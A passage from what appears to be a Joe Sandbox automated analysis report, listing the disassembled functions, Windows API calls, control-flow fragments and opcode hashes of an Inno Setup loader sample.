                                                                          • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A010
                                                                          • SetWindowLongA.USER32(00020420,000000FC,004097FC), ref: 0040A027
                                                                            • Part of subcall function 00406ADC: GetCommandLineA.KERNEL32(00000000,00406B20,?,?,?,?,00000000,?,0040A098,?), ref: 00406AF4
                                                                            • Part of subcall function 00409888: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02072BFC,00409974,00000000,0040995B), ref: 004098F8
                                                                            • Part of subcall function 00409888: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02072BFC,00409974,00000000), ref: 0040990C
                                                                            • Part of subcall function 00409888: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409925
                                                                            • Part of subcall function 00409888: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409937
                                                                            • Part of subcall function 00409888: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02072BFC,00409974), ref: 00409940
                                                                          • RemoveDirectoryA.KERNEL32(00000000,0040A166,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A113
                                                                          • 73A25CF0.USER32(00020420,0040A166,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A127
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryErrorExitLastLineLongMultipleObjectsRemoveWait
                                                                          • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                          • API String ID: 240127915-3001827809
                                                                          • Opcode ID: 41e9b17cc1901837085009e7774581f9f675215498936b1d5fec870b95540319
                                                                          • Instruction ID: cbbd3698a6e5ddb8e812fa6c760aedb007618753dcf5685e5a94b93d1743052f
                                                                          • Opcode Fuzzy Hash: 41e9b17cc1901837085009e7774581f9f675215498936b1d5fec870b95540319
                                                                          • Instruction Fuzzy Hash: 04412B70A00205DBC715EBA9EE86B9E3BA5EB84304F10427BF510B73E2DB789801DB5D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00409888 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77processCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02072BFC,00409974,00000000,0040995B), ref: 004098F8
                                                                          • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02072BFC,00409974,00000000), ref: 0040990C
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409925
                                                                          • GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409937
                                                                          • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02072BFC,00409974), ref: 00409940
                                                                            • Part of subcall function 00409460: GetLastError.KERNEL32(00000000,00409503,?,0040B240,?,02072BFC), ref: 00409484
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                          • String ID: D
                                                                          • API String ID: 3356880605-2746444292
                                                                          • Opcode ID: 3e364823df46f41b243604843b678d585e88c5cad38ef85377b023b87dae9783
                                                                          • Instruction ID: 0c6d97fba1df7b16fba7b9ed0c132cba9133a3324ac8f072eb64155fee6ae1b7
                                                                          • Opcode Fuzzy Hash: 3e364823df46f41b243604843b678d585e88c5cad38ef85377b023b87dae9783
                                                                          • Instruction Fuzzy Hash: AC1130B16142086EDB10FBE68C52F9EBBACEF49718F50013EB614F62C7DA785D048669
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00409D26 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117windowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409D8A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Message
                                                                          • String ID: $u@$.tmp
                                                                          • API String ID: 2030045667-236237750
                                                                          • Opcode ID: 76a7687ccf1c1f3f155fed8792e4b2e0c469f7c74cc7371f2538726c547644a2
                                                                          • Instruction ID: fbeaf51a7290a35b1d20cf1acd7fffd14229a7cea4ec7fe779b7d8bf1d8f9ef0
                                                                          • Opcode Fuzzy Hash: 76a7687ccf1c1f3f155fed8792e4b2e0c469f7c74cc7371f2538726c547644a2
                                                                          • Instruction Fuzzy Hash: 7041A170604201DFD311EF19DE92A5A7BA6FB49304B11453AF801B73E2CB79AC01DAAD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00409D41 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113windowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409D8A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Message
                                                                          • String ID: $u@$.tmp
                                                                          • API String ID: 2030045667-236237750
                                                                          • Opcode ID: 4be92c8e37dddd0a3a50cfadddd3e7ce3c10b6794e32ae209eae1f209508f25f
                                                                          • Instruction ID: 7aabf0afbc79ebbbc3d3aa4d6af75c8ddef5afe13af9357e4f9bebdf666c2db7
                                                                          • Opcode Fuzzy Hash: 4be92c8e37dddd0a3a50cfadddd3e7ce3c10b6794e32ae209eae1f209508f25f
                                                                          • Instruction Fuzzy Hash: 66418070600201DFC711EF69DE92A5A7BB6FB49304B11457AF801B73E2CB79AC01DAAD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00409254 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00409343,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040929A
                                                                          • GetLastError.KERNEL32(00000000,00000000,?,00000000,00409343,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004092A3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectoryErrorLast
                                                                          • String ID: .tmp
                                                                          • API String ID: 1375471231-2986845003
                                                                          • Opcode ID: 7647810fba1c1a7df54c129ecd6d2966c744d5805a6f131b99297333171aebfe
                                                                          • Instruction ID: 381de743b5e558d6c5ac88c9815bc56a2e764fefa580558ac3af8d983805238d
                                                                          • Opcode Fuzzy Hash: 7647810fba1c1a7df54c129ecd6d2966c744d5805a6f131b99297333171aebfe
                                                                          • Instruction Fuzzy Hash: 3C214975A002089BDB01EFE1C9429DEB7B9EB48304F10457BE901B73C2DA7CAF058AA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00406F00 Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 311 406f00-406f53 SetErrorMode call 403414 LoadLibraryA
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00008000), ref: 00406F0A
                                                                          • LoadLibraryA.KERNEL32(00000000,00000000,00406F54,?,00000000,00406F72,?,00008000), ref: 00406F39
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLibraryLoadMode
                                                                          • String ID:
                                                                          • API String ID: 2987862817-0
                                                                          • Opcode ID: 280b78466cfb49ac5d1a4d8de4e82968344a77d2278ba686a31885ea79f0a63b
                                                                          • Instruction ID: 61c75ae37e4b7eabf140846b9e9d3e90831ba1beb5fed57b889ca027c52d2016
                                                                          • Opcode Fuzzy Hash: 280b78466cfb49ac5d1a4d8de4e82968344a77d2278ba686a31885ea79f0a63b
                                                                          • Instruction Fuzzy Hash: 49F08270614704BEDB029FB69C6282BBBFCE749B0475348B6F904A26D2E53C5D208568
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004075CC Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 321 4075cc-4075f1 SetFilePointer 322 407603-407608 321->322 323 4075f3-4075fa GetLastError 321->323 323->322 324 4075fc-4075fe call 4073ec 323->324 324->322
                                                                          APIs
                                                                          • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 004075EB
                                                                          • GetLastError.KERNEL32(?,?,?,00000000), ref: 004075F3
                                                                            • Part of subcall function 004073EC: GetLastError.KERNEL32($u@,0040748A,?,?,020703AC,?,00409BAD,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 004073EF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$FilePointer
                                                                          • String ID:
                                                                          • API String ID: 1156039329-0
                                                                          • Opcode ID: 4b4e93de333a3cce642c2996d73c93b1535ff8d1f0695df8178d397978e57373
                                                                          • Instruction ID: cda5b13584bb414d1d7c0d7cef5a43535e1b929ad68122291bf656bee98e9d77
                                                                          • Opcode Fuzzy Hash: 4b4e93de333a3cce642c2996d73c93b1535ff8d1f0695df8178d397978e57373
                                                                          • Instruction Fuzzy Hash: A0E092766081016FD601D55EC881B9B33DCDFC5365F00453ABA54EB2D1D675AC0087B6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040758C Relevance: 3.0, APIs: 2, Instructions: 30fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 315 40758c-4075aa ReadFile 316 4075c3-4075ca 315->316 317 4075ac-4075b0 315->317 318 4075b2-4075ba GetLastError 317->318 319 4075bc-4075be call 4073ec 317->319 318->316 318->319 319->316
                                                                          APIs
                                                                          • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 004075A3
                                                                          • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 004075B2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastRead
                                                                          • String ID:
                                                                          • API String ID: 1948546556-0
                                                                          • Opcode ID: 60e63bc2ff5526e1bd28c8a7098a19329bed0093cf160d1b5924f83231400461
                                                                          • Instruction ID: 6d0e635579d8ef6deec62af0acb898b5effba2491802df9b0589d4017bc118ea
                                                                          • Opcode Fuzzy Hash: 60e63bc2ff5526e1bd28c8a7098a19329bed0093cf160d1b5924f83231400461
                                                                          • Instruction Fuzzy Hash: 4FE012B1A181147AEB24965A9CC5FAB6BDCCBC5314F14847BF904DB282D678DC04877B
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00407524 Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 326 407524-407545 SetFilePointer 327 407557-407559 326->327 328 407547-40754e GetLastError 326->328 328->327 329 407550-407552 call 4073ec 328->329 329->327
                                                                          APIs
                                                                          • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 0040753B
                                                                          • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 00407547
                                                                            • Part of subcall function 004073EC: GetLastError.KERNEL32($u@,0040748A,?,?,020703AC,?,00409BAD,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 004073EF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$FilePointer
                                                                          • String ID:
                                                                          • API String ID: 1156039329-0
                                                                          • Opcode ID: 0dd762855ce75d8d861d21fe55c1929f9bb0fd02210f0b496c114b023f039fab
                                                                          • Instruction ID: cd7afd6369a15af5fc7b0f7528e30ca6696358c0ea2e6c45e94f6e0b4d50a73a
                                                                          • Opcode Fuzzy Hash: 0dd762855ce75d8d861d21fe55c1929f9bb0fd02210f0b496c114b023f039fab
                                                                          • Instruction Fuzzy Hash: 0EE04FB1600210AFEB10EEB98C81B9672DC9F48364F048576EA14DF2C6D274DC00C766
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00401430 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 331 401430-40143d 332 401446-40144c 331->332 333 40143f-401444 331->333 334 401452-40146a VirtualAlloc 332->334 333->334 335 40146c-40147a call 4012e4 334->335 336 40148f-401492 334->336 335->336 339 40147c-40148d VirtualFree 335->339 339->336
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 2087232378-0
                                                                          • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                          • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                          • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                          • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004051D0 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetSystemDefaultLCID.KERNEL32(00000000,00405306), ref: 004051EF
                                                                            • Part of subcall function 00404C2C: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404C49
                                                                            • Part of subcall function 0040515C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,00405227,?,00000000,00405306), ref: 0040517A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: DefaultInfoLoadLocaleStringSystem
                                                                          • String ID:
                                                                          • API String ID: 1658689577-0
                                                                          • Opcode ID: 9ea3c66d670cb0c44a2644de082ff92dfdb36693542507e19320d23b5394a13d
                                                                          • Instruction ID: c760dbbb10683706500036a577470844d35ac6ab0c013c9c95042e4326961867
                                                                          • Opcode Fuzzy Hash: 9ea3c66d670cb0c44a2644de082ff92dfdb36693542507e19320d23b5394a13d
                                                                          • Instruction Fuzzy Hash: 3B313D75E00119ABCB00EF95C8C19EEB779FF84304F158977E815BB285E739AE058B98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004074D6 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00407518
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: ce86d0b46b6749cbb1c8065cdd94f6338fa023cacd1506a2c152e65e14b54ccf
                                                                          • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                          • Opcode Fuzzy Hash: ce86d0b46b6749cbb1c8065cdd94f6338fa023cacd1506a2c152e65e14b54ccf
                                                                          • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004074D8 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00407518
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 5c7f1f50133f8918f9d70925a1da877e635501982028b62cfe689d085d452769
                                                                          • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                          • Opcode Fuzzy Hash: 5c7f1f50133f8918f9d70925a1da877e635501982028b62cfe689d085d452769
                                                                          • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040693C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,00406984,?,?,?,?,00000000,?,00406999,00406CC7,00000000,00406D0C,?,?,?), ref: 00406967
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: 53f9965764e037d0eade91fd77cfc00c47722664131d9e88e47f7f2d0abdeb71
                                                                          • Instruction ID: a5d31a369ac9c1460ce21b6bb4ed2cb839aeaeb50f5f76e03c39097c5263300d
                                                                          • Opcode Fuzzy Hash: 53f9965764e037d0eade91fd77cfc00c47722664131d9e88e47f7f2d0abdeb71
                                                                          • Instruction Fuzzy Hash: A9E065712043047FD701EA629C52959B7ACDB89708B924476B501A6682D5785E108568
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00407628 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040763F
                                                                            • Part of subcall function 004073EC: GetLastError.KERNEL32($u@,0040748A,?,?,020703AC,?,00409BAD,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 004073EF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID:
                                                                          • API String ID: 442123175-0
                                                                          • Opcode ID: 2449abf237b154253dcf2b231e0da589e0eb2b5517b9a23d8c49629d5bbf5411
                                                                          • Instruction ID: 68b513bd5595dc6b38f1d245c0222f257f742b1e6f06676187839ef0e6677733
                                                                          • Opcode Fuzzy Hash: 2449abf237b154253dcf2b231e0da589e0eb2b5517b9a23d8c49629d5bbf5411
                                                                          • Instruction Fuzzy Hash: 93E01A727081106BEB10E65EDCC0EABA7DCDFC5764F04547BBA08EB291D674AC049676
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004071E4 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,0040904B,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,Wow64DisableWow64FsRedirection,00000000,00409061), ref: 00407203
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2867664193.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2867644215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867685661.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2867708438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: FormatMessage
                                                                          • String ID:
                                                                          • API String ID: 1306739567-0
                                                                          • Opcode ID: 606059c89ae6d8e8cf07aa2f3a49422b1cb7a18355834490beef1a35ac41266b
                                                                          • Instruction ID: 095b59eb22c1ada42cfe979e419102ec0d22498c88dfceb067fba30b4837873c
                                                                          • Opcode Fuzzy Hash: 606059c89ae6d8e8cf07aa2f3a49422b1cb7a18355834490beef1a35ac41266b
                                                                          • Instruction Fuzzy Hash: 8DE0D8A0B8830125F22514544C87B77110E53C0700F50847EB710ED3D3D6BEA90641AF
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

